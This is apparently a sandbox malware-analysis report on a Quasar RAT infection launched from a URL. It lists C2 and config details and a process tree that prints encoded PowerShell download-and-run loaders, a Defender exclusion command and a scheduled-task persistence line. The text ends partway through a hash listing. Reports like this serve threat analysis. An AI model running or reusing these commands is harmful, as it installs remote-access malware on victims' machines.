Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://streannable....

windows10-2004-x64

Analysis

  • max time kernel
    87s
  • max time network
    88s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/12/2024, 19:38

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    https://streannable.com/7n3qtp

Score
10/10
quasarafafafdiscoveryexecutionpersistenceprivilege_escalationspywaretrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://i.imghippo.com/files/CFqi5277Mc.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://i.imghippo.com/files/mcm7321uo.jpg

Extracted

Family

quasar

Version

1.4.1

Botnet

afafaf

C2

194.26.192.167:2768

Mutex

c1060262-cacc-4b5e-8e09-ac72d84cef52

Attributes
  • encryption_key

    BE2B0B270E4DB19CAA5C42E9D2EBF64645A2D055

  • install_name

    OneDrive.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    OneDrive

  • subdirectory

    OneDrive

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Start PowerShell.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Accessibility Features 1 TTPs

    Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.

    persistenceprivilege_escalation
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 51 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://streannable.com/7n3qtp
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3132
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ff80db246f8,0x7ff80db24708,0x7ff80db24718
      2⤵
        PID:536
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        2⤵
          PID:2244
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4296
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
          2⤵
            PID:4376
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
            2⤵
              PID:1536
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
              2⤵
                PID:4260
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:1
                2⤵
                  PID:2908
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
                  2⤵
                    PID:3012
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
                    2⤵
                      PID:3772
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
                      2⤵
                        PID:1588
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6088 /prefetch:8
                        2⤵
                          PID:2780
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6088 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5116
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4276 /prefetch:1
                          2⤵
                            PID:2848
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
                            2⤵
                              PID:1616
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
                              2⤵
                                PID:2424
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
                                2⤵
                                  PID:4948
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
                                  2⤵
                                    PID:3408
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5008 /prefetch:8
                                    2⤵
                                      PID:4400
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,12103626664830372364,4681777747086768076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6776 /prefetch:8
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:5644
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                                    1⤵
                                      PID:4172
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff80db246f8,0x7ff80db24708,0x7ff80db24718
                                        2⤵
                                          PID:2476
                                      • C:\Windows\System32\CompPkgSrv.exe
                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                        1⤵
                                          PID:2220
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:2444
                                          • C:\Windows\system32\osk.exe
                                            "C:\Windows\system32\osk.exe"
                                            1⤵
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            • Suspicious use of SetWindowsHookEx
                                            PID:5848
                                          • C:\Windows\system32\AUDIODG.EXE
                                            C:\Windows\system32\AUDIODG.EXE 0x4f4 0x4cc
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5740
                                          • C:\Windows\System32\rundll32.exe
                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                            1⤵
                                              PID:4304
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\n.cmd"
                                              1⤵
                                                PID:3268
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -w h -command ""
                                                  2⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:6004
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\Downloads\n.cmd' -ArgumentList 'am_admin'"
                                                  2⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Modifies registry class
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1976
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\n.cmd" am_admin
                                                    3⤵
                                                      PID:5680
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -w h -command ""
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1968
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3784
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:6016
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGkALgBpAG0AZwBoAGkAcABwAG8ALgBjAG8AbQAvAGYAaQBsAGUAcwAvAEMARgBxAGkANQAyADcANwBNAGMALgBqAHAAZwAiADsAJABwAGEAdABoAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE8AbgBlAEQAcgBpAHYAZQAiADsAbQBrAGQAaQByACAAJABwAGEAdABoACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsAaQB3AHIAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAIgAkAHAAYQB0AGgAXABiAHUAZABkAHkALgBqAHAAZwAiADsAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABUAGUAeAB0ACgAIgAkAHAAYQB0AGgAXABPAG4AZQBEAHIAaQB2AGUALgBjAG0AZAAiACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABnAGMAIAAiACQAcABhAHQAaABcAGIAdQBkAGQAeQAuAGoAcABnACIAIAAtAFIAYQB3ACkAKQApACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAHAAYQB0AGgAXABPAG4AZQBEAHIAaQB2AGUALgBjAG0AZAAiAA0ACgA=
                                                        4⤵
                                                        • Blocklisted process makes network request
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2256
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.cmd" "
                                                          5⤵
                                                            PID:5324
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -w h -command ""
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:672
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGkALgBpAG0AZwBoAGkAcABwAG8ALgBjAG8AbQAvAGYAaQBsAGUAcwAvAG0AYwBtADcAMwAyADEAdQBvAC4AagBwAGcAIgA7ACQAcABhAHQAaAA9ACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABPAG4AZQBEAHIAaQB2AGUAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7ACQAYgA2ADQARgBpAGwAZQA9ACIAJABwAGEAdABoAFwAZgBpAGwAZQAuAGoAcABnACIAOwAkAGUAeABlAEYAaQBsAGUAPQAiACQAcABhAHQAaABcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlACIAOwBpAHcAcgAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGIANgA0AEYAaQBsAGUAOwBbAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAZQB4AGUARgBpAGwAZQAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABnAGMAIAAkAGIANgA0AEYAaQBsAGUAIAAtAFIAYQB3ACkAKQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQB4AGUARgBpAGwAZQA=
                                                              6⤵
                                                              • Blocklisted process makes network request
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:6060
                                                              • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
                                                                "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
                                                                7⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:3020
                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                  "schtasks" /create /tn "OneDrive" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe" /rl HIGHEST /f
                                                                  8⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:4700
                                                                • C:\Windows\System32\shutdown.exe
                                                                  "C:\Windows\System32\shutdown.exe" /s /t 0
                                                                  8⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4932
                                                  • C:\Windows\System32\NOTEPAD.EXE
                                                    "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.cmd
                                                    1⤵
                                                    • Opens file in notepad (likely ransom note)
                                                    PID:4560
                                                  • C:\Windows\system32\LogonUI.exe
                                                    "LogonUI.exe" /flags:0x4 /state0:0xa389f055 /state1:0x41c64e6d
                                                    1⤵
                                                    • Modifies data under HKEY_USERS
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:4816
                                                  • C:\Windows\system32\atbroker.exe
                                                    atbroker.exe
                                                    1⤵
                                                    • Modifies data under HKEY_USERS
                                                    PID:3908

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                    Filesize

                                                    2KB

                                                    MD5

                                                    d85ba6ff808d9e5444a4b369f5bc2730

                                                    SHA1

                                                    31aa9d96590fff6981b315e0b391b575e4c0804a

                                                    SHA256

                                                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                    SHA512

                                                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                    Filesize

                                                    152B

                                                    MD5

                                                    99afa4934d1e3c56bbce114b356e8a99

                                                    SHA1

                                                    3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

                                                    SHA256

                                                    08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

                                                    SHA512

                                                    76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                    Filesize

                                                    152B

                                                    MD5

                                                    443a627d539ca4eab732bad0cbe7332b

                                                    SHA1

                                                    86b18b906a1acd2a22f4b2c78ac3564c394a9569

                                                    SHA256

                                                    1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

                                                    SHA512

                                                    923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                    Filesize

                                                    403B

                                                    MD5

                                                    594a681b65058ebf2e49c74d01e7f5ff

                                                    SHA1

                                                    c484963765c3f267630e84b085bba2a74b8f6bbd

                                                    SHA256

                                                    d4ecf6371360c9e220ecff6fb7824fd56670b5c72decd3a7308c06fd53e167d3

                                                    SHA512

                                                    bf5980892f47a8a75af3364cb40d7d0c355a30cd515cc57017b7d0f2c27f62862448ff29c9ba5f9138f44c2ce0b67f1342459d5d39129381e9f175dec7b258b5

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                    Filesize

                                                    111B

                                                    MD5

                                                    285252a2f6327d41eab203dc2f402c67

                                                    SHA1

                                                    acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                    SHA256

                                                    5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                    SHA512

                                                    11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                    Filesize

                                                    5KB

                                                    MD5

                                                    9da44c85e0b1fd9b46cea4608137259a

                                                    SHA1

                                                    81bc986d7ba414f9230e15d50fcdd360ed679229

                                                    SHA256

                                                    1b9e56640862763b6f3ab4be5a435a256ad94ce0143364511057a2b6e80a7b15

                                                    SHA512

                                                    603deb59649224d5031b1b936a020248538005c70f3882ac89b1c503d4ef8a08d542ded70655fcdc5fcf35d6b47bb3b94af54113899d9315b0666e0cf2d99027

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                    Filesize

                                                    6KB

                                                    MD5

                                                    4a501b73d8dda61c0f99c7eabdf2b265

                                                    SHA1

                                                    70eae9776239467808795c583f046d78a18f3999

                                                    SHA256

                                                    3c186e3bdf008176eede6cfc9c10576f464763f0b6fed5fb6bd16040717cec56

                                                    SHA512

                                                    567b1773aa912c33a2e82178c72087da7bc2a8b2af459d2ee6269793e7bf7c427737a7fd3ae7f4945c8636a31321a8233a2cfe5117a636c136ac74c100a2b49e

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                    Filesize

                                                    6KB

                                                    MD5

                                                    ca3e5f77683aae9b4385126eb25c2715

                                                    SHA1

                                                    368db25b216d37be68638f56d45dbafa1489376a

                                                    SHA256

                                                    b898b50170edea1434ae98ade3bc4d6e423057b001481df665b5987795b16dcb

                                                    SHA512

                                                    4fbe46cdbd329c5234cbe792b6afcb20170deeefa3fbcd99d3a48161384784bd263f7ad36c0875d9d891de9bd77507d9bff656a356947e7e593375138130cf87

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                    Filesize

                                                    6KB

                                                    MD5

                                                    87b1b969d8a7701968ff8d8f82648697

                                                    SHA1

                                                    784cb1f34132a1c6cc57f4fdf5271e8c683808b8

                                                    SHA256

                                                    9f5e09eb98e533473044022a707c1221e6ebab406c648bb16eb5a50142278d00

                                                    SHA512

                                                    cead1a61af74988317d2deec1ebb65ef2bdd7777375cc9c5b1b6384029a3e8bf9bb2bf2d23224918d2534eb349ac4f4f09242d785f10dcbb30cf8da66047aabf

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000002.dbtmp
                                                    Filesize

                                                    16B

                                                    MD5

                                                    206702161f94c5cd39fadd03f4014d98

                                                    SHA1

                                                    bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                    SHA256

                                                    1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                    SHA512

                                                    0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                    Filesize

                                                    16B

                                                    MD5

                                                    46295cac801e5d4857d09837238a6394

                                                    SHA1

                                                    44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                    SHA256

                                                    0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                    SHA512

                                                    8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                    Filesize

                                                    10KB

                                                    MD5

                                                    705e1ac2f6ba9298f5275d8815bc9ebf

                                                    SHA1

                                                    469719c596aa0b5581fe056a82990fd10cf993e8

                                                    SHA256

                                                    a5cf0fd968e22f12f89f0e047c7f5640020ba504f85abbc3075c7b6d9c2a230e

                                                    SHA512

